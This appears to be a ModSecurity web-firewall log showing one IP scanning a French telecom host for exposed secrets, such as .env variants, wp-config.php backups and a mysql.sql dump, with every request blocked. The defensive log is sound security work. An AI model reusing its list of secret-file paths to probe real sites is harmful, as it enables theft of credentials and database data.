[Mon May 11 20:55:55.939929 2026] [security2:error] [pid 1502013:tid 1502058] [client 195.178.110.199:34310] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/wp-config.php.old"] [unique_id "agImO5Yn-x0CHsbEbP2tsQAAAIg"]
[Mon May 11 20:55:55.940221 2026] [security2:error] [pid 1502013:tid 1502058] [client 195.178.110.199:34310] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/wp-config.php.old"] [unique_id "agImO5Yn-x0CHsbEbP2tsQAAAIg"]
[Mon May 11 20:55:55.958397 2026] [security2:error] [pid 1501831:tid 1501845] [client 195.178.110.199:34304] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "conge.tct-telecom.fr"] [uri "/wp-content/mysql.sql"] [unique_id "agImO1NddpkriGUb6ZV2zQAAAQw"]
[Mon May 11 20:55:55.958733 2026] [security2:error] [pid 1501831:tid 1501845] [client 195.178.110.199:34304] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/wp-content/mysql.sql"] [unique_id "agImO1NddpkriGUb6ZV2zQAAAQw"]
[Mon May 11 20:55:55.958979 2026] [security2:error] [pid 1501831:tid 1501845] [client 195.178.110.199:34304] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/wp-content/mysql.sql"] [unique_id "agImO1NddpkriGUb6ZV2zQAAAQw"]
[Mon May 11 20:55:55.974433 2026] [security2:error] [pid 1516058:tid 1516102] [client 195.178.110.199:36068] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/backend/.env"] [unique_id "agImOyMeXtzav-mi9SyxlgAAAMw"]
[Mon May 11 20:55:55.974599 2026] [security2:error] [pid 1516058:tid 1516102] [client 195.178.110.199:36068] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/backend/.env"] [unique_id "agImOyMeXtzav-mi9SyxlgAAAMw"]
[Mon May 11 20:55:55.974955 2026] [security2:error] [pid 1516058:tid 1516102] [client 195.178.110.199:36068] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/backend/.env"] [unique_id "agImOyMeXtzav-mi9SyxlgAAAMw"]
[Mon May 11 20:55:56.039085 2026] [security2:error] [pid 1501883:tid 1501907] [client 195.178.110.199:36098] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env"] [unique_id "agImPDP5Q_-MBliRCAxnYQAAABY"]
[Mon May 11 20:55:56.039265 2026] [security2:error] [pid 1501883:tid 1501907] [client 195.178.110.199:36098] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env"] [unique_id "agImPDP5Q_-MBliRCAxnYQAAABY"]
[Mon May 11 20:55:56.040381 2026] [security2:error] [pid 1501883:tid 1501907] [client 195.178.110.199:36098] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env"] [unique_id "agImPDP5Q_-MBliRCAxnYQAAABY"]
[Mon May 11 20:55:56.088775 2026] [security2:error] [pid 1502013:tid 1502033] [client 195.178.110.199:34226] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.new"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/wp-config.php.new"] [unique_id "agImPJYn-x0CHsbEbP2ttAAAAIQ"]
[Mon May 11 20:55:56.088971 2026] [security2:error] [pid 1502013:tid 1502033] [client 195.178.110.199:34226] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/wp-config.php.new"] [unique_id "agImPJYn-x0CHsbEbP2ttAAAAIQ"]
[Mon May 11 20:55:56.089199 2026] [security2:error] [pid 1502013:tid 1502033] [client 195.178.110.199:34226] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/wp-config.php.new"] [unique_id "agImPJYn-x0CHsbEbP2ttAAAAIQ"]
[Mon May 11 20:55:56.134594 2026] [security2:error] [pid 1511173:tid 1511197] [client 195.178.110.199:36036] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env"] [unique_id "agImPPjVc-A-CSptvm1xbgAAAFU"]
[Mon May 11 20:55:56.134827 2026] [security2:error] [pid 1511173:tid 1511197] [client 195.178.110.199:36036] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env"] [unique_id "agImPPjVc-A-CSptvm1xbgAAAFU"]
[Mon May 11 20:55:56.135251 2026] [security2:error] [pid 1511173:tid 1511197] [client 195.178.110.199:36036] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env"] [unique_id "agImPPjVc-A-CSptvm1xbgAAAFU"]
[Mon May 11 20:55:56.152551 2026] [security2:error] [pid 1501831:tid 1501843] [client 195.178.110.199:36064] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env-example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env-example"] [unique_id "agImPFNddpkriGUb6ZV2zwAAAQo"]
[Mon May 11 20:55:56.152781 2026] [security2:error] [pid 1501831:tid 1501843] [client 195.178.110.199:36064] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env-example"] [unique_id "agImPFNddpkriGUb6ZV2zwAAAQo"]
[Mon May 11 20:55:56.153417 2026] [security2:error] [pid 1501831:tid 1501843] [client 195.178.110.199:36064] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env-example"] [unique_id "agImPFNddpkriGUb6ZV2zwAAAQo"]
[Mon May 11 20:55:56.173963 2026] [security2:error] [pid 1511173:tid 1511193] [client 195.178.110.199:36082] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env-sample"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env-sample"] [unique_id "agImPPjVc-A-CSptvm1xcAAAAFE"]
[Mon May 11 20:55:56.174292 2026] [security2:error] [pid 1511173:tid 1511193] [client 195.178.110.199:36082] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env-sample"] [unique_id "agImPPjVc-A-CSptvm1xcAAAAFE"]
[Mon May 11 20:55:56.174837 2026] [security2:error] [pid 1511173:tid 1511193] [client 195.178.110.199:36082] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env-sample"] [unique_id "agImPPjVc-A-CSptvm1xcAAAAFE"]
[Mon May 11 20:55:56.223275 2026] [security2:error] [pid 1501831:tid 1501857] [client 195.178.110.199:36172] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.backup"] [unique_id "agImPFNddpkriGUb6ZV20AAAARg"]
[Mon May 11 20:55:56.223493 2026] [security2:error] [pid 1501831:tid 1501857] [client 195.178.110.199:36172] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.backup"] [unique_id "agImPFNddpkriGUb6ZV20AAAARg"]
[Mon May 11 20:55:56.223896 2026] [security2:error] [pid 1501831:tid 1501857] [client 195.178.110.199:36172] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.backup"] [unique_id "agImPFNddpkriGUb6ZV20AAAARg"]
[Mon May 11 20:55:56.234126 2026] [security2:error] [pid 1502013:tid 1502037] [client 195.178.110.199:36048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.bak"] [unique_id "agImPJYn-x0CHsbEbP2ttwAAAIo"]
[Mon May 11 20:55:56.234307 2026] [security2:error] [pid 1502013:tid 1502037] [client 195.178.110.199:36048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.bak"] [unique_id "agImPJYn-x0CHsbEbP2ttwAAAIo"]
[Mon May 11 20:55:56.234603 2026] [security2:error] [pid 1502013:tid 1502037] [client 195.178.110.199:36048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.bak"] [unique_id "agImPJYn-x0CHsbEbP2ttwAAAIo"]
[Mon May 11 20:55:56.256298 2026] [security2:error] [pid 1516058:tid 1516114] [client 195.178.110.199:36174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.config"] [unique_id "agImPCMeXtzav-mi9SyxmgAAANg"]
[Mon May 11 20:55:56.256610 2026] [security2:error] [pid 1516058:tid 1516114] [client 195.178.110.199:36174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.config"] [unique_id "agImPCMeXtzav-mi9SyxmgAAANg"]
[Mon May 11 20:55:56.258245 2026] [security2:error] [pid 1516058:tid 1516114] [client 195.178.110.199:36174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.config"] [unique_id "agImPCMeXtzav-mi9SyxmgAAANg"]
[Mon May 11 20:55:56.258699 2026] [security2:error] [pid 1502013:tid 1502037] [client 195.178.110.199:36048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.dev"] [unique_id "agImPJYn-x0CHsbEbP2tuAAAAIo"]
[Mon May 11 20:55:56.258848 2026] [security2:error] [pid 1502013:tid 1502037] [client 195.178.110.199:36048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.dev"] [unique_id "agImPJYn-x0CHsbEbP2tuAAAAIo"]
[Mon May 11 20:55:56.259032 2026] [security2:error] [pid 1502013:tid 1502037] [client 195.178.110.199:36048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.dev"] [unique_id "agImPJYn-x0CHsbEbP2tuAAAAIo"]
[Mon May 11 20:55:56.259501 2026] [security2:error] [pid 1534836:tid 1534890] [client 195.178.110.199:36124] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.development"] [unique_id "agImPNeaRXe5lR8y0ZOSzgAAAVM"]
[Mon May 11 20:55:56.259703 2026] [security2:error] [pid 1534836:tid 1534890] [client 195.178.110.199:36124] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.development"] [unique_id "agImPNeaRXe5lR8y0ZOSzgAAAVM"]
[Mon May 11 20:55:56.260069 2026] [security2:error] [pid 1534836:tid 1534890] [client 195.178.110.199:36124] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.development"] [unique_id "agImPNeaRXe5lR8y0ZOSzgAAAVM"]
[Mon May 11 20:55:56.264468 2026] [security2:error] [pid 1501883:tid 1501909] [client 195.178.110.199:36142] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.docker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.docker/.env"] [unique_id "agImPDP5Q_-MBliRCAxnZAAAABg"]
